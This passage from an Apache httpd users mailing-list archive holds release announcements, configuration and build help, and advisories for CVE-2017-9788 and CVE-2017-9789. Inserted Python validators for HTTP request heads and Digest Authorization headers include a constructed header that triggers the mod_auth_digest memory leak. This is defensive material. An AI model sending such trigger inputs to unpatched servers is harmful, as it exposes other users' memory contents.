unwise traffic to pass, but fixing the client is the correct solution.
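
As an added illustration (not code from this thread or from httpd), the checker below applies the request-head rules William describes, which a server evaluates before any virtual host is chosen: CRLF-only line endings, a three-token request line, token header names with no space before the colon, and a Host header for HTTP/1.1. The sample requests are constructed.

```python
import re

# RFC 7230 "token" characters: legal in methods and header field names.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
VERSION = re.compile(r"HTTP/[0-9]\.[0-9]")
# Field values: visible ASCII, SP, HTAB and obs-text; no raw control bytes.
FIELD_VALUE = re.compile(r"[\t\x20-\x7e\x80-\xff]*")


def check_request_head(raw: bytes):
    """Return (ok, reason) for the head of an HTTP/1.x request.

    Every line must end in CRLF (a bare CR or LF is rejected), the request
    line must be METHOD SP target SP HTTP/x.y, every header line must be
    token ":" value, and an HTTP/1.1 request must carry a Host header.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False, "head not terminated by CRLF CRLF (bare LF or truncated)"
    lines = head.decode("latin-1").split("\r\n")
    for ln in lines:
        if "\r" in ln or "\n" in ln:
            return False, "bare CR or LF: a line was not terminated by CRLF"
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return False, "request line is not METHOD SP target SP version"
    method, target, version = parts
    if not TOKEN.fullmatch(method):
        return False, f"invalid method token {method!r}"
    if not target or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False, "invalid request target"
    if not VERSION.fullmatch(version):
        return False, f"invalid HTTP version {version!r}"
    saw_host = False
    for ln in lines[1:]:
        name, colon, value = ln.partition(":")
        # No whitespace is allowed between the field name and the colon,
        # so "Host : x" fails the token test just as "Ho st: x" does.
        if not colon or not TOKEN.fullmatch(name):
            return False, f"malformed header field {ln!r}"
        if not FIELD_VALUE.fullmatch(value):
            return False, f"control characters in value of {name!r}"
        saw_host |= name.lower() == "host"
    if version == "HTTP/1.1" and not saw_host:
        return False, "HTTP/1.1 request without a Host header"
    return True, "ok"


# Constructed sample requests (not captured traffic).
GOOD_REQUEST = (b"GET /index.html HTTP/1.1\r\n"
                b"Host: www.example.test\r\n"
                b"User-Agent: constructed-sample/1.0\r\n\r\n")
BARE_LF_REQUEST = (b"GET /index.html HTTP/1.1\r\n"
                   b"Host: www.example.test\n"        # LF only, no CR
                   b"Accept: */*\r\n\r\n")
SPACE_BEFORE_COLON = (b"GET /index.html HTTP/1.1\r\n"
                      b"Host : www.example.test\r\n\r\n")
EXTRA_SPACE_REQUEST_LINE = (b"GET  /index.html HTTP/1.1\r\n"
                            b"Host: www.example.test\r\n\r\n")
NO_HOST_REQUEST = b"GET /index.html HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    samples = [("good", GOOD_REQUEST), ("bare LF", BARE_LF_REQUEST),
               ("space before colon", SPACE_BEFORE_COLON),
               ("two spaces in request line", EXTRA_SPACE_REQUEST_LINE),
               ("no Host", NO_HOST_REQUEST)]
    for label, req in samples:
        ok, reason = check_request_head(req)
        print(f"{label:28s} -> {'accept' if ok else '400'}: {reason}")
```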


Re: [users@httpd] APR Table vs. Hash & Array vs. Skip List vs. Ring

2018-05-31 Thread William A Rowe Jr
On Sun, May 27, 2018 at 10:00 PM, Simon Walter  wrote:

> On 05/27/2018 05:49 PM, Nick Kew wrote:
> >> On 27 May 2018, at 03:40, Simon Walter  wrote:
> >>
> >> Hi everyone,
> >>
> >> First of all, I am not sure if this is the right place to ask this.
> >> Please send me to the appropriate mailing list. Thanks.
> >
> > What's the context?  Given where you asked, I'll guess you're writing
> > a module for your web server, in which case, there's a modules-dev list
> > for the next question.
>
> Thanks. Maybe I will ask there next time. Though, no I am not writing a
> module.
>

Note that the apr project doesn't distinguish devs from users (same set),
much like openssl closed their dev list because all users are devs.

Feel free to ask dev@apr.a.o if you have a 'usage' question, because the
project considers all of these to be part of developing a useful library.

Cheers,

Bill


Re: [users@httpd] Apache as a Mutual SSL enabled Forward Proxy

2018-05-24 Thread William A Rowe Jr
Your next thing to test, from a vanilla/completely reset browser, would be
to load up these corresponding cert+key and ca chain files into that blank
slate, and ensure that these credentials actually work against your backend;

  SSLProxyMachineCertificateFile D:\sys-projects\aaa\Apache24\Apache24\security\key-client.pem
  SSLProxyCACertificateFile D:\sys-projects\aaa\Apache24\Apache24\security\server.pem

Also drop your proxy server's log level to debug and discover what it has
to say.

On Thu, May 24, 2018 at 2:42 AM, eranda rajapaksha 
wrote:

> Hi all,
>
> I'm trying to configure Apache http server as a forward proxy with mutual
> ssl enabled. Following is the setup,
>
> [HTTP client] --> [Apache Http Server]--->[Web Server]
>
> I need to enable Mutual SSL between the Apache Http Server and the Web Server.
> Following is the proxy I have configured. It works fine when connecting to
> other internet web servers.
>
> Listen 3128
>
> 
>   ProxyRequests On
>   SSLProxyEngine On
>   SSLVerifyClient require
>   SSLVerifyDepth  10
>
>   SSLProxyMachineCertificateFile D:\sys-projects\aaa\Apache24\Apache24\security\key-client.pem
>   SSLProxyCACertificateFile D:\sys-projects\aaa\Apache24\Apache24\security\server.pem
>
> 
>
>
> I have tested connecting client directly to the Web server bypassing
> Apache Forward proxy and it works fine. But when it tries to connect
> through Apache server I'm getting following error on clients end,
>
> java.io.IOException: Unable to tunnel through proxy. Proxy returns
> "HTTP/1.1 403 Proxy Error"
>
> Even if I just enable one way SSL, the behavior is the same. Am I not
> importing the Server cert correctly into Apache? Or is there another
> configuration issue in my setup?
>
> Please help me on this.
>
>
> Thanks,
> --
> Eranda Rajapakshe
> Computer Science and Engineering Undergraduate,
> University of Moratuwa.
> Tel : +94784822608
> Email : erand...@gmail.com 
>


[users@httpd] [Appeal] zh Reviewers wanted (was: Attempting translating Chinese documentation)

2018-05-17 Thread William A Rowe Jr
On Sun, May 13, 2018 at 8:24 AM, CodeingBoy  wrote:

> Hello William, thanks for your information. I have completed the
> translation of the error messages.
> I have translated these messages into both Simplified Chinese (zh-cn) and
> Traditional Chinese (zh-tw). One thing that should be noticed is that I'm not a
> native speaker of Traditional Chinese, so Taiwanese readers might find it a
> little weird (though they can understand it).
> On the other hand, I did a lot of checking to make sure the translations contain
> few mistakes (if any). A reviewer would be helpful, but I didn't find
> one. :(
>

Thank you for your contribution and attention to detail! Committed to httpd
trunk in
http://svn.apache.org/viewvc?view=revision&revision=1831800

If any conversant/native reader would kindly review either (or both) the
draft zh-cn and/or zh-tw error text, we can move on to backporting this
commit to 2.4.x for the next release. For the entire draft error page doc
set, please checkout;
http://svn.apache.org/repos/asf/httpd/httpd/trunk/docs/error/

Sharing with users@ to hopefully find a willing reviewer.

Again, thank you much!

Cheers,

Bill

ps: to any of you on users@ who might be interested, if you are willing to
review docs submissions in your native/fluent languages, please consider
subscribing to d...@httpd.apache.org to lend your aid. TIA!


[users@httpd] Re: [REQUEST] Httpd Webserver Training in French

2018-01-04 Thread William A Rowe Jr
Hi Sharan,

it's usually more efficient to ask the community directly about
project-specific asks. I've gone ahead and forwarded your note to the users
and dev lists where we are more likely to find the right resources. I
personally know at least a half dozen httpd committers proficient in French,
so this seems in the realm of possibility!

Potential presenters,

note contact info below to reach out.



On Thu, Jan 4, 2018 at 8:38 AM, Sharan Foga  wrote:
> Hi Everyone
>
> I've posted a message on the httpd dev mailing list too but am including it
> here just in case we have someone that can do it!
>
> During the Open Source Summit in Paris, a company (starinux.org) came to the
> Apache booth to ask us about getting some training on the httpd webserver for
> their members. They are looking for one full day of training. The company is a
> French one so the training would need to be done in French too. The location
> will be Paris, La Defense.
>
> If anyone is interested in providing some training for them then their 
> contact details are as follows:
>
> Antoine Wache
> cont...@starinux.org
>
> Thanks
> Sharan
>
>
>
> -
> To unsubscribe, e-mail: dev-unsubscr...@community.apache.org
> For additional commands, e-mail: dev-h...@community.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org



Re: [users@httpd] Is httpd 2.4.x is supported on CentOs6?

2017-11-30 Thread William A Rowe Jr
According to my notes, that is 2.2.15.

As noted previously, turn to RH for support. The EOL was back in July and
we will stop making public comments or security advisories once we have
fewer than three active project members attending to this legacy version.



On Nov 28, 2017 06:47, "chetan jain"  wrote:

Hi All,

As apache 2.2.x is EOL, I need to upgrade to httpd 2.4.x version but I am
not able to verify anywhere if it is supported/tested configuration with
Centos 6 OS?

Any inputs are highly appreciated.

Thanks,
Chetan


Re: [users@httpd] RE: [ANNOUNCE] Apache HTTP Server 2.4.29 Released

2017-10-25 Thread William A Rowe Jr
Actually, that was in APR-util 1.6.1, see the APR release announcement and
Craig's users@httpd post.



On Wed, Oct 25, 2017 at 4:02 PM, Craig Young  wrote:
> I’m not sure if this is what is referred to in the Apache 2.4.29 
> announcement, but please note that the Apache Portable Runtime v1.6.3 release 
> resolved memory safety issues I found in functions used within HTTP server.  
> This was released in conjunction with 2.4.29.
>
> Using HTTP server linked to prior versions of APR exposes the risks outlined 
> in my email sent to this list on Monday.
>
> Best Regards,
> Craig
>
> On 10/25/17, 1:05 PM, "Development Manager" 
>  wrote:
>
> The 2.4.29 changes document doesn't reference any CVE articles, though 
> the announcement indicates that this is a security release. Are any of the 
> 2.4.29 changes security related?
>
> Thanks,
> Jim
>




Re: [users@httpd] [ANNOUNCE] Apache HTTP Server 2.4.29 Released

2017-10-23 Thread William A Rowe Jr
On Mon, Oct 23, 2017 at 11:53 AM, William A Rowe Jr <wr...@rowe-clan.net> wrote:
> On Mon, Oct 23, 2017 at 11:45 AM, Jim Jagielski <j...@jagunet.com> wrote:
>>  Apache HTTP Server 2.4.29 Released
>>
>> October 23, 2017
>>
>> The Apache Software Foundation and the Apache HTTP Server Project
>> are pleased to announce the release of version 2.4.29 of the Apache
>> HTTP Server ("Apache").  This version of Apache is our latest GA
>> release of the new generation 2.4.x branch of Apache HTTPD and
>> represents fifteen years of innovation by the project, and is
>> recommended over all previous releases. This release of Apache is
>> a security, feature, and bug fix release.
>>
>> We consider this release to be the best version of Apache available, and
>> encourage users of all prior versions to upgrade.
>>
>> Apache HTTP Server 2.4.29 is available for download from:
>>
>>   http://httpd.apache.org/download.cgi
>
> Broken link.

And... back in sync. Thanks for RM'ing!




Re: [users@httpd] [ANNOUNCE] Apache HTTP Server 2.4.29 Released

2017-10-23 Thread William A Rowe Jr
On Mon, Oct 23, 2017 at 11:45 AM, Jim Jagielski  wrote:
>  Apache HTTP Server 2.4.29 Released
>
> October 23, 2017
>
> The Apache Software Foundation and the Apache HTTP Server Project
> are pleased to announce the release of version 2.4.29 of the Apache
> HTTP Server ("Apache").  This version of Apache is our latest GA
> release of the new generation 2.4.x branch of Apache HTTPD and
> represents fifteen years of innovation by the project, and is
> recommended over all previous releases. This release of Apache is
> a security, feature, and bug fix release.
>
> We consider this release to be the best version of Apache available, and
> encourage users of all prior versions to upgrade.
>
> Apache HTTP Server 2.4.29 is available for download from:
>
>   http://httpd.apache.org/download.cgi

Broken link.




[users@httpd] Fwd: [Announcement] Apache HTTP Server 2.4.28 Released

2017-10-09 Thread William A Rowe Jr
For anyone not subscribed to announce@, sorry I hadn't passed this on...

-- Forwarded message --
From: "William A Rowe Jr" <wr...@apache.org>
Date: Oct 5, 2017 13:48
Subject: [Announcement] Apache HTTP Server 2.4.28 Released
To: <annou...@apache.org>
Cc:

> Apache HTTP Server 2.4.28 Released
>
> October 5, 2017
>
> The Apache Software Foundation and the Apache HTTP Server Project
> are pleased to announce the release of version 2.4.28 of the Apache
> HTTP Server ("Apache").  This version of Apache is our latest GA
> release of the new generation 2.4.x branch of Apache HTTPD and
> represents fifteen years of innovation by the project, and is
> recommended over all previous releases. This release of Apache is
> a security, feature, and bug fix release.
>
> We consider this release to be the best version of Apache available, and
> encourage users of all prior versions to upgrade.
>
> Apache HTTP Server 2.4.28 is available for download from:
>
>   http://httpd.apache.org/download.cgi
>
> Apache 2.4 offers numerous enhancements, improvements, and performance
> boosts over the 2.2 codebase.  For an overview of new features
> introduced since 2.4 please see:
>
>   http://httpd.apache.org/docs/trunk/new_features_2_4.html
>
> Please see the CHANGES_2.4 file, linked from the download page, for a
> full list of changes. A condensed list, CHANGES_2.4.28 includes only
> those changes introduced since the prior 2.4 release.  A summary of all
> of the security vulnerabilities addressed in this and earlier releases
> is available:
>
>   http://httpd.apache.org/security/vulnerabilities_24.html
>
> Of particular note in this release is 1 SECURITY item:
>
>   o SECURITY: CVE-2017-9798 (cve.mitre.org)
> Corrupted or freed memory access. <Limit[Except] > or the
> RegisterHttpMethod directive must be given in the startup
> configuration (httpd.conf) to register non-standard HTTP methods
> before listing them in an .htaccess files.
>
> This release requires the Apache Portable Runtime (APR), minimum
> version 1.5.x, and APR-Util, minimum version 1.5.x. Some features may
> require the 1.6.x version of both APR and APR-Util. The APR libraries
> must be upgraded for all features of httpd to operate correctly.
>
> This release builds on and extends the Apache 2.2 API.  Modules written
> for Apache 2.2 will need to be recompiled in order to run with Apache
> 2.4, and require minimal or no source code changes.
>
>   http://svn.apache.org/repos/asf/httpd/httpd/trunk/VERSIONING
>
> When upgrading or installing this version of Apache, please bear in mind
> that if you intend to use Apache with one of the threaded MPMs (other
> than the Prefork MPM), you must ensure that any modules you will be
> using (and the libraries they depend on) are thread-safe.
>
> Please note that while the Apache HTTP Server Project may publish some
> security patches to the 2.2.x flavor through at least December of 2017,
> no further maintenance patches of 2.2.x will be considered and no further
> releases will be distributed. The 2.2.x branch has now reached the end of
> its maintenance, and users are strongly encouraged to promptly complete
> their transitions to this 2.4.x flavor of httpd to benefit from security
> and bug fixes, as well as new features.
>
>


[users@httpd] Fwd: Flood 0.4 status? (was: flood 0.4 was never signed for?)

2017-09-14 Thread William A Rowe Jr
Copying users@ in case some of you are Flood subproject users,
please make your voices heard.

Thanks,

Bill


-- Forwarded message --
From: William A Rowe Jr <wr...@rowe-clan.net>
Date: Thu, Sep 14, 2017 at 10:48 AM
Subject: Re: Flood 0.4 status? (was: flood 0.4 was never signed for?)
To: httpd <d...@httpd.apache.org>


I know many of you had busy summers and August holidays... just want
to be sure that nobody who wanted to comment has missed discussion
of retiring the Flood subproject.

If we don't reach any other conclusion or interest, we should wind this down
next week in response to Daniel's concern from the Infra team.

The only remaining question is do we (httpd PMC) archive this, or do we
hand the baton off to the Attic for this legacy source code?




On Wed, Sep 6, 2017 at 12:25 AM, Luca Toscano <toscano.l...@gmail.com> wrote:
> Hi William,
>
> As far as I can see the project seems abandoned, so in my opinion unless
> somebody steps up to work on it I'd be in favor of removing it from
> www.a.o/dist/httpd/flood.
>
> Luca
>
>
> 2017-09-01 18:39 GMT+02:00 William A Rowe Jr <wr...@rowe-clan.net>:
>>
>> What's our position on this? Is it time to declare flood abandoned?
>>
>> Are there any users of this tool who want to contribute to maintaining it?
>>
>> Offhand, I expect it does not support TLS/SNI. Nor HTTP/2.
>>
>> If abandoned, we can simply remove www.a.o/dist/httpd/flood
>> to resolve Daniel's issue. If not abandoned, regenerating the
>> tarball from should result in the same file, which can then be
>> signed.
>>
>> Thoughts?
>>
>>
>>
>> On Sat, Aug 19, 2017 at 12:43 AM, Daniel Gruno <humbed...@apache.org>
>> wrote:
>> > Hi folks,
>> >
>> > It appears that flood 0.4 (
>> > https://dist.apache.org/repos/dist/release/httpd/flood/ ) was never
>> > signed by anyone, which should likely be fixed. As this was, AIUI,
>> > released 8 years ago, I cannot in good conscience sign for it myself.
>> >
>> > Either we have someone who was present back then sign for it, or we
>> > should remove the release, pursuant to our release policy.
>> >
>> > With regards,
>> > Daniel.
>
>




[users@httpd] Flood 0.4 status? (was: flood 0.4 was never signed for?)

2017-09-01 Thread William A Rowe Jr
What's our position on this? Is it time to declare flood abandoned?

Are there any users of this tool who want to contribute to maintaining it?

Offhand, I expect it does not support TLS/SNI. Nor HTTP/2.

If abandoned, we can simply remove www.a.o/dist/httpd/flood
to resolve Daniel's issue. If not abandoned, regenerating the
tarball from should result in the same file, which can then be
signed.

Thoughts?



On Sat, Aug 19, 2017 at 12:43 AM, Daniel Gruno  wrote:
> Hi folks,
>
> It appears that flood 0.4 (
> https://dist.apache.org/repos/dist/release/httpd/flood/ ) was never
> signed by anyone, which should likely be fixed. As this was, AIUI,
> released 8 years ago, I cannot in good conscience sign for it myself.
>
> Either we have someone who was present back then sign for it, or we
> should remove the release, pursuant to our release policy.
>
> With regards,
> Daniel.




Re: [users@httpd] How to use binary to run httpd in different location

2017-08-02 Thread William A Rowe Jr
On Wed, Aug 2, 2017 at 6:24 AM, Eric Covener  wrote:
> On Wed, Aug 2, 2017 at 5:21 AM, Hemant Chaudhary
>  wrote:
>> Hi
>>
>> I have ported apache on my machine. I have copied bin, lib, conf, modules,
>> htdocs, logs to another location. Now I want to run my apache in the new location
>> with these things only.
>> I changed the paths in httpd.config and apachectl of the new location, but while
>> starting it is starting apache in the old location.
>>
>> For example :
>> I ported apache on /home/hemant ..
>> I copied bin,conf,logs,htdocs,modules to /home/rakesh and in httpd.config I
>> replace all path of /home/hemant to /home/rakesh and changed port also. But
>> when I am starting apache, it is only starting at /home/hemant.
>
> pass -d  /home/rakesh/... to apachectl?

That would be the best case. It might also be necessary to flip the
LD_LIBRARY_PATH to point to the {httpd-dir}/lib directory so that all
of the linked libraries are loaded correctly.




[users@httpd] CVE-2017-9788: Uninitialized memory reflection in mod_auth_digest

2017-07-13 Thread William A Rowe Jr
CVE-2017-9788: Uninitialized memory reflection in mod_auth_digest

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
all versions through 2.2.33 and 2.4.26

Description:
The value placeholder in [Proxy-]Authorization headers
of type 'Digest' was not initialized or reset by
mod_auth_digest before or between successive key=value
assignments. Providing an initial key with no '='
assignment could reflect the stale value of uninitialized
pool memory used by the prior request, leading to leakage
of potentially confidential information, and a segfault.

Mitigation:
All users of httpd should upgrade to 2.4.27 (or minimally
2.2.34, which will receive no further security releases.)
Alternately, the administrator could configure httpd to
reject requests with a header matching a complex regular
expression identifying where the '=' character does not occur
in the first key=value pair, as in the following syntax;
[Proxy-]Authorization: Digest key[,key=value]

Credit:
The Apache HTTP Server security team would like to thank Robert Święcki
for reporting this issue.

References:
https://httpd.apache.org/security_report.html

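
As an added reference implementation (not httpd's code and not part of the advisory above), the check below inspects a [Proxy-]Authorization value and rejects Digest credentials in which any auth-param, the first one in particular, lacks an '=' assignment: the same condition the advisory's workaround regular expression is meant to match. Non-Digest schemes pass untouched; all header values are constructed.

```python
import re

# RFC 7230 "token" characters, the only ones legal in an auth-param name.
TOKEN = re.compile(r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")


def split_auth_params(params: str):
    """Split a Digest auth-param list on commas outside quoted-strings.

    A comma inside a quoted value (e.g. uri="/a?x=1,2") must not split the
    element, and a backslash-escaped quote must not close the quoted-string.
    """
    elements, buf, in_quotes, escaped = [], [], False, False
    for ch in params:
        if escaped:
            buf.append(ch)
            escaped = False
        elif in_quotes and ch == "\\":
            buf.append(ch)
            escaped = True
        elif ch == '"':
            in_quotes = not in_quotes
            buf.append(ch)
        elif ch == "," and not in_quotes:
            elements.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    elements.append("".join(buf).strip())
    # RFC 7235 tolerates empty list elements ("a=1, , b=2"); drop them.
    return [e for e in elements if e]


def check_digest_authorization(header_value: str):
    """Return (ok, reason) for an Authorization / Proxy-Authorization value.

    Only Digest credentials are inspected. Every auth-param must have the
    form key=value; a bare key such as the leading "username" in
    'Digest username, realm="x"' is rejected, as is a non-token name or an
    unterminated quoted-string.
    """
    scheme, _, params = header_value.strip().partition(" ")
    if scheme.lower() != "digest":
        return True, f"scheme {scheme!r} is not Digest; check not applicable"
    elements = split_auth_params(params)
    if not elements:
        return False, "Digest credentials carry no auth-params"
    for idx, elem in enumerate(elements):
        key, eq, value = elem.partition("=")
        key, value = key.strip(), value.strip()
        if not eq:
            return False, f"auth-param #{idx + 1} ({key!r}) has no '=' assignment"
        if not TOKEN.fullmatch(key):
            return False, f"auth-param name {key!r} is not a token"
        if value.startswith('"') and (len(value) < 2 or not value.endswith('"')):
            return False, f"unterminated quoted-string in {key!r}"
    return True, "ok"


# Constructed header values (not captured traffic).
GOOD_DIGEST = ('Digest username="alice", realm="example.test", nonce="abc123", '
               'uri="/dir/index.html?a=1,2", '
               'response="6629fae49393a05397450978507c4ef1"')
BARE_FIRST_KEY = 'Digest username, realm="example.test", nonce="abc123"'
BARE_LATER_KEY = 'Digest username="alice", realm="example.test", nonce'
BASIC_CREDS = "Basic YWxpY2U6c2VjcmV0"

if __name__ == "__main__":
    for value in (GOOD_DIGEST, BARE_FIRST_KEY, BARE_LATER_KEY, BASIC_CREDS):
        ok, reason = check_digest_authorization(value)
        print(f"{'pass  ' if ok else 'reject'} {value[:40]!r}... : {reason}")
```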



[users@httpd] CVE-2017-9789: Read after free in mod_http2

2017-07-13 Thread William A Rowe Jr
CVE-2017-9789: Read after free in mod_http2

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
httpd 2.4.26

Description:
When under stress, closing many connections, the HTTP/2
handling code would sometimes access memory after it has
been freed, resulting in potentially erratic behaviour.

Mitigation:
2.4.26 users of mod_http2 should upgrade to 2.4.27.

Credit:
The Apache HTTP Server security team would like to thank Robert Święcki
for reporting this issue.

References:
https://httpd.apache.org/security_report.html




Re: [users@httpd] [ANNOUNCEMENT] Apache HTTP Server 2.4.27 Released

2017-07-11 Thread William A Rowe Jr
On Tue, Jul 11, 2017 at 9:13 AM, Hajo Locke  wrote:
>
> Am 11.07.2017 um 15:58 schrieb Eric Covener:
>>
>> On Tue, Jul 11, 2017 at 9:41 AM, David Copeland
>>  wrote:

>>>> o HTTP/2 will not be negotiated when using the Prefork MPM
>>>
>>> I'm wondering what the reason for this is?
>>
>> In the previous release, HTTP2 made prefork run multi-threaded. People
>> often chose prefork due to non-threadsafe code running in the server.
>>
>>
> so we can't use http/2 in 2.4.27 when using mod_prefork? it is not
> configurable?

> We use mod_prefork because of mod_php.

Please also note, mod_php has been strongly discouraged for years.

The conventional advice is to configure the php fcgi sapi, using either
mod_proxy_fcgi with php fpm, or mod_fcgid, and a modest number of
single process php fcgi workers to serve requests, and either event or
worker MPM. This is still not spelled out well in the formal PHP docs
(but who reads docs?)




[users@httpd] [Announcement] Apache HTTP Server 2.2.34 Released

2017-07-11 Thread William A Rowe Jr
  July 11, 2017

   The Apache Software Foundation and the Apache HTTP Server Project
   announce the release of version 2.2.34 of the Apache HTTP Server
   ("Apache"), the final maintenance release of the 2.2 series. No
   further 2.2 releases are anticipated. This version of Apache is
   principally a security and bug fix maintenance release.

   We consider the current Apache HTTP Server 2.4 release to be the best
   version of Apache available, and encourage every user of 2.2 and all
   prior versions to upgrade. This final 2.2 release is offered for those
   unable to upgrade at this moment.

   Take note that the Apache Web Server Project will provide no future release
   of the 2.2.x series, although some security patches may be published
   through December of 2017. These will be collected at the URL;

 http://www.apache.org/dist/httpd/patches/apply_to_2.2.34/

   No further maintenance patches of 2.2.x will be published. Users are
   strongly encouraged to promptly complete their transitions to the
   2.4.x flavor of httpd to receive any future benefit from the user
   community or the Apache HTTP Server project developers.

   For further details about the currently supported release, see:

 http://www.apache.org/dist/httpd/Announcement2.4.txt

   Apache HTTP Server 2.4 and 2.2.34 are available for download from:

 http://httpd.apache.org/download.cgi

   Please see the CHANGES_2.2 file, linked from the download page, for a
   full list of changes. A condensed list, CHANGES_2.2.34 includes only
   those changes introduced since the prior 2.2 release. A summary of all
   of the security vulnerabilities addressed in this and earlier releases
   is available:

 http://httpd.apache.org/security/vulnerabilities_22.html

   Note that the Apache HTTP Server project will discontinue evaluations
   and corresponding advisories to this resource effective January, 2018.

   This release includes the Apache Portable Runtime (APR) version 1.5.2
   and APR Utility Library (APR-util) version 1.5.4, bundled with the tar
   and zip distributions. The APR libraries libapr and libaprutil (and
   on Win32, libapriconv version 1.2.1) must all be updated to ensure
   binary compatibility and address many known security and platform bugs.
   APR version 1.5 and APR-util version 1.5 represent minor version upgrades
   from earlier httpd 2.2 source distributions.

   Note this package also includes very stale and known-vulnerable versions
   of the Expat [http://expat.sourceforge.net/] and PCRE [http://www.pcre.org/]
   packages. Users are strongly encouraged to first install the most recent
   versions of these components (of PCRE 8.x, not PCRE2 10.x at this time.)

   This release builds on and extends the Apache 2.0 API and is superseded
   by the Apache 2.4 API. Modules written for Apache 2.2 will need to be
   recompiled in order to run with Apache 2.4, and most will require minimal
   or no source code changes.




Re: [users@httpd] Problems building httpd-2.4.26 with apr-1.6.2 and apr-util-1.6.0

2017-06-23 Thread William A Rowe Jr
On Fri, Jun 23, 2017 at 11:22 AM, Eric Covener  wrote:
> On Fri, Jun 23, 2017 at 10:55 AM, Martin Knoblauch  wrote:
>>  Apparently apr-util no longer bundles "expat". So my question: what is the
>> correct/intended way to work around this?
>
>
> apr-util accepts a --with-expat.  If you build apr-util under httpd's
> srclib/ --with-expat can be specified at the top and it will be passed
> down.

Note this shouldn't be necessary once you've installed libexpat
(-dev / -devel depending on your OS conventions.)

Expat 2 is finally quite stable and with some luck you can rely
on your OS vendor to patch security defects. Once you've installed
the dev[el] package, apr should detect expat without hints.




Re: [users@httpd] if directive not being respected in Apache 2.4.6

2017-06-21 Thread William A Rowe Jr
On Wed, Jun 21, 2017 at 10:39 AM, Eric Covener  wrote:
> On Fri, Jun 9, 2017 at 12:36 PM, Day, Chuck  wrote:
>>Define locale1 fr-FR
>
> It is not currently documented or rejected, but "Define" can't be
> wrapped in any of the normal configuration sections (only ifdefine,
> ifmodule, etc. can wrap it)
> It is processed at startup only, not during request processing.

Actually, it is documented, see last para;

http://httpd.apache.org/docs/2.4/mod/core.html#define

Frankly I'd think scope should be defined as Global only,
even though it won't error out in these other cases. For
trunk, it would be good to lock this down and eliminate
the legacy 'support' of Define in sections.




RE: [users@httpd] Building httpd2.4.25 on powerpc-ibm-aix7.1.0.0

2017-05-31 Thread William A Rowe Jr
You'll need to provision libuuid and rebuild apr[-util] - a required
prerequisite for httpd.

On May 31, 2017 2:25 PM, "Joseph, Anselm"  wrote:

> Thank you all for your replies.
>
> So I got back on the horse and installed latest APRs and PCRE, then ran
> configure again as follows:
>
> CC='gcc' CPP='gcc -E' ./configure --enable-so --enable-dav
> --prefix=/opt/eai/ci/httpd-2.4.25/apache
> --with-iconv=/opt/eai/ci/libiconv-1.15/libiconv/lib
> --with-apr=/opt/eai/ci/httpd-2.4.25/srclib/apr
> --with-apr-util=/opt/eai/ci/httpd-2.4.25/srclib/apr-util
> --with-pcre=/opt/eai/ci/httpd-2.4.25/srclib/pcre/pcre-config
>
> Config was clean, with a warning about OpenSSL being too old
>
> configure:37818: summary of build options:
>
> Server Version: 2.4.25
> Install prefix: /opt/eai/ci/httpd-2.4.25/apache
> C compiler: gcc -std=gnu99
> CFLAGS:   -O2 -pg -pthread
> LDFLAGS: -Wl,-brtl
> LIBS:
> CPPFLAGS:-U__STR__ -D_THREAD_SAFE -D_LARGEFILE64_SOURCE
> C preprocessor: gcc -E
>
> I tried 'make' and got the following "Undefined symbol: apr_os_uuid_get"
> error:
>
> Target "local-all" is up to date.
> Target "all" is up to date.
>
> /opt/eai/ci/httpd-2.4.25/srclib/apr/build-1/libtool --silent
> --mode=compile gcc -std=gnu99  -O2 -pg -pthread  -U__STR__
> -D_THREAD_SAFE -D_LARGEFILE64_SOURCE -I. 
> -I/opt/eai/ci/httpd-2.4.25/os/unix
> -I/opt/eai/ci/httpd-2.4.25/include 
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr-util/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/pcre/include 
> -I/opt/eai/ci/httpd-2.4.25/modules/aaa
> -I/opt/eai/ci/httpd-2.4.25/modules/cache 
> -I/opt/eai/ci/httpd-2.4.25/modules/core
> -I/opt/eai/ci/httpd-2.4.25/modules/database 
> -I/opt/eai/ci/httpd-2.4.25/modules/filters
> -I/opt/eai/ci/httpd-2.4.25/modules/ldap 
> -I/opt/eai/ci/httpd-2.4.25/modules/loggers
> -I/opt/eai/ci/httpd-2.4.25/modules/lua 
> -I/opt/eai/ci/httpd-2.4.25/modules/proxy
> -I/opt/eai/ci/httpd-2.4.25/modules/session 
> -I/opt/eai/ci/httpd-2.4.25/modules/ssl
> -I/opt/eai/ci/httpd-2.4.25/modules/test -I/opt/eai/ci/httpd-2.4.25/server
> -I/opt/eai/ci/httpd-2.4.25/modules/arch/unix 
> -I/opt/eai/ci/httpd-2.4.25/modules/dav/main
> -I/opt/eai/ci/httpd-2.4.25/modules/generators 
> -I/opt/eai/ci/httpd-2.4.25/modules/mappers
> -prefer-non-pic -static -c modules.c && touch modules.lo
>
> gcc -std=gnu99  -O2 -pg -pthread  -U__STR__ -D_THREAD_SAFE
> -D_LARGEFILE64_SOURCE -I. -I/opt/eai/ci/httpd-2.4.25/os/unix
> -I/opt/eai/ci/httpd-2.4.25/include 
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/apr-util/include/apr-1
> -I/opt/eai/ci/httpd-2.4.25/srclib/pcre/include 
> -I/opt/eai/ci/httpd-2.4.25/modules/aaa
> -I/opt/eai/ci/httpd-2.4.25/modules/cache 
> -I/opt/eai/ci/httpd-2.4.25/modules/core
> -I/opt/eai/ci/httpd-2.4.25/modules/database 
> -I/opt/eai/ci/httpd-2.4.25/modules/filters
> -I/opt/eai/ci/httpd-2.4.25/modules/ldap 
> -I/opt/eai/ci/httpd-2.4.25/modules/loggers
> -I/opt/eai/ci/httpd-2.4.25/modules/lua 
> -I/opt/eai/ci/httpd-2.4.25/modules/proxy
> -I/opt/eai/ci/httpd-2.4.25/modules/session 
> -I/opt/eai/ci/httpd-2.4.25/modules/ssl
